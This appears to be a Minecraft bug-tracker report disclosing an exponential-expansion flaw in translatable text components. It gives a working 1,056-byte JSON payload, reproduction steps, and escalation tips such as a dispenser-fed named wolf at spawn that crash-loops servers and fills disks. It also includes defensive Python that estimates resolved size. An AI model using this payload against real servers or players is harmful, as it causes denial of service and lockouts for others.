Major design flaw in translatable components allows for exponentially large components, which can be easily exploited on both servers and clients
Yeah, it's me again. This one is way worse than MC-256127.
If it were possible to include past versions, I would have included nearly every modern version of Minecraft, because versions dating all the way back to 1.7.10 are affected. I strongly urge you to fix this as soon as possible, as it can be exploited in so many ways. Both servers and clients are affected by this exploit in some capacity, so I've split this report into sections for servers and clients.
I will be using the component data below as the payload when demonstrating the exploit, but I suspect that it can be strengthened by replacing the "ouch!" text component with something much larger.
{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"translate":"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s","with":[{"text":"ouch!"}]}]}]}]}
Overview
The translatable text component ({"translate": ..., "with": [...]}) contains a design flaw in how it is resolved: a placeholder such as %1$s may appear in the format string any number of times, every occurrence is resolved by copying the referenced "with" argument, and that argument can itself be another translatable component. The resolved output is therefore the product of the placeholder counts at every nesting level, i.e. exponential in the nesting depth of the input. Because a key like "%1$s%1$s..." is not a real translation key, the fallback path uses the key itself as the format string, so no language file or resource pack is needed. The payload above is a mere 1,056 bytes (four nested levels with 72, 54, 54 and 54 placeholders respectively, which is what that byte count works out to), yet the innermost "ouch!" component is copied 72 × 54 × 54 × 54 = 11,337,408 times, and once those copies are serialised with their formatting the output is somewhere in the hundreds of megabytes.
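As an added example (written for this page; it is not the report's or Mojang's code), the Python below models how a translatable component resolves: a generator that reproduces the payload above byte for byte from its level widths, a linear-time size estimate that a server or client could run before rendering or logging, and a renderer that aborts once an output budget is exceeded. The semantics it assumes (an unknown key is used verbatim as the format string; each %s or %N$s is replaced by a copy of the matching "with" argument; out-of-range placeholders are echoed literally) are a simplification of the game's behaviour and are marked as assumptions in the code.

```python
"""Simplified model of translatable-component resolution (added example,
not game code). Assumes: unknown translation keys are used verbatim as
the format string, each %s / %N$s placeholder is replaced by a copy of
the matching "with" argument, arguments may be translatable components,
and out-of-range placeholders are emitted literally (assumption)."""
import json
import re

# %s (positional, consumed left to right) or %3$s (explicit 1-based index)
PLACEHOLDER = re.compile(r"%(?:(\d+)\$)?s")


def build_payload(widths, leaf="ouch!"):
    """widths[i] = number of %1$s in the level-i format string.
    build_payload([72, 54, 54, 54]) reproduces the 1,056-byte payload."""
    node = {"text": leaf}
    for width in reversed(widths):
        node = {"translate": "%1$s" * width, "with": [node]}
    return json.dumps(node, separators=(",", ":"))


def payload_component(widths, leaf="ouch!"):
    """Same payload, parsed back into a component dict."""
    return json.loads(build_payload(widths, leaf))


def _segments(fmt, nargs):
    """Yield (literal_before, arg_index_or_None, raw_token) per placeholder,
    then a final (tail_literal, None, "") segment."""
    pos, implicit = 0, 0
    for m in PLACEHOLDER.finditer(fmt):
        if m.group(1) is None:
            idx, implicit = implicit, implicit + 1
        else:
            idx = int(m.group(1)) - 1
        yield fmt[pos:m.start()], (idx if 0 <= idx < nargs else None), m.group(0)
        pos = m.end()
    yield fmt[pos:], None, ""


def resolved_length(component):
    """Characters the fully resolved text would contain, computed WITHOUT
    resolving it: each argument is measured once and multiplied by the
    number of placeholders that reference it, so the cost is linear in the
    payload even when the output would be hundreds of megabytes."""
    total = 0
    if "text" in component:
        total = len(component["text"])
    elif "translate" in component:
        args = component.get("with", [])
        arg_len = [resolved_length(a) for a in args]  # measured once each
        for literal, idx, raw in _segments(component["translate"], len(args)):
            total += len(literal) + (arg_len[idx] if idx is not None else len(raw))
    return total + sum(resolved_length(e) for e in component.get("extra", []))


def is_safe(component, budget):
    """Cheap pre-check: refuse components that would resolve past `budget`."""
    return resolved_length(component) <= budget


class ExpansionBudgetExceeded(ValueError):
    pass


def render(component, budget):
    """Resolve to plain text, aborting as soon as the output exceeds
    `budget` characters (second line of defence behind is_safe)."""
    out, size = [], 0

    def emit(s):
        nonlocal size
        size += len(s)
        if size > budget:
            raise ExpansionBudgetExceeded(
                f"resolved text exceeds {budget} characters; refusing to expand")
        out.append(s)

    def walk(c):
        if "text" in c:
            emit(c["text"])
        elif "translate" in c:
            args = c.get("with", [])
            for literal, idx, raw in _segments(c["translate"], len(args)):
                emit(literal)
                if idx is None:
                    emit(raw)          # assumption: echo unresolvable token
                else:
                    walk(args[idx])    # every reference copies the argument
        for extra in c.get("extra", []):
            walk(extra)

    walk(component)
    return "".join(out)


if __name__ == "__main__":
    comp = payload_component([72, 54, 54, 54])
    print("payload bytes:", len(build_payload([72, 54, 54, 54])))
    print("resolved chars:", resolved_length(comp))
    print("safe under 32 KiB budget:", is_safe(comp, 32 * 1024))
```

The important property is that resolved_length never touches the exponential output: a server can run it on an entity name, sign line or chat component before the death-message logger or the renderer does, and drop anything over a small budget. Dropping on the cheap check is what makes the defence hold; a renderer that only counts as it goes still does budget-sized work per hostile component.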
Clients
Signs, chat messages, titles, entities, scoreboards and items can all carry the component, and the client freezes the moment it starts resolving it in preparation for rendering. Delivery methods include:
- Signs and entities act as a sort of "chunk ban": the client freezes every time the chunk containing them is sent, so an affected player cannot rejoin near it.
- Items freeze the client as soon as a world containing them loads or the item is hovered over in a GUI, and can act as a sort of "inventory ban" for a player holding one.
- Books freeze the client of anyone who opens them.
- Scoreboards, boss bars, titles and chat messages freeze every client that receives them.
Steps to reproduce
DISCLAIMER: Only do this in a world you don't care about.
- Copy the hotbar.nbt from the attachments into your .minecraft folder
- Boot up your client
- Load up a world
- Put the sign from the saved hotbars into your inventory
- Place the sign
Servers
Servers are by far the most exposed to this exploit. The server logs the death of every named mob, and resolving the name into that log line expands the whole component, so when the payload is applied to the name of a Wolf that then dies, the server instantly becomes unresponsive while it writes hundreds of megabytes of log output to disk per Wolf.
That may seem bad on its own, but it only gets worse. The exploit can be abused even further by going to the world spawn and putting a spawn egg carrying the Wolf's data into a dispenser wired to a redstone clock. The spawn chunks are loaded and ticked whether or not any player is online, so the result is continuous log spam that rapidly pushes the log file toward gigabyte sizes (faster still if the "ouch!" text component is replaced with something much larger).
Often the server simply crashes when the watchdog detects the hung tick and steps in. Automatic restarts do not help: the dispenser at spawn fires again as soon as the world loads, so the server crashes again on every boot.
On some modded servers where the watchdog is modified to behave differently (not like it would matter to you, but I figured it might be worth documenting), this exploit genuinely causes the JVM to run out of memory just trying to dump everything to disk for logging.
Steps to reproduce
DISCLAIMER: Only do this in a world you don't care about.
- Copy the hotbar.nbt from the attachments into your .minecraft folder
- Boot up your client
- Connect to the server
- Put the Wolf Spawn Egg from the saved hotbars into your inventory
- Place down the spawn egg to spawn the Wolf (this will crash your client in the process!) or do what I noted above and stick it into a dispenser connected to a redstone clock.
2022-10-01, 05:22 AM
2025-01-23, 10:44 PM
client, crash, disk-filler, exploit, freeze, json, lockup, log-spam, placeholder, recursion, server, size, translation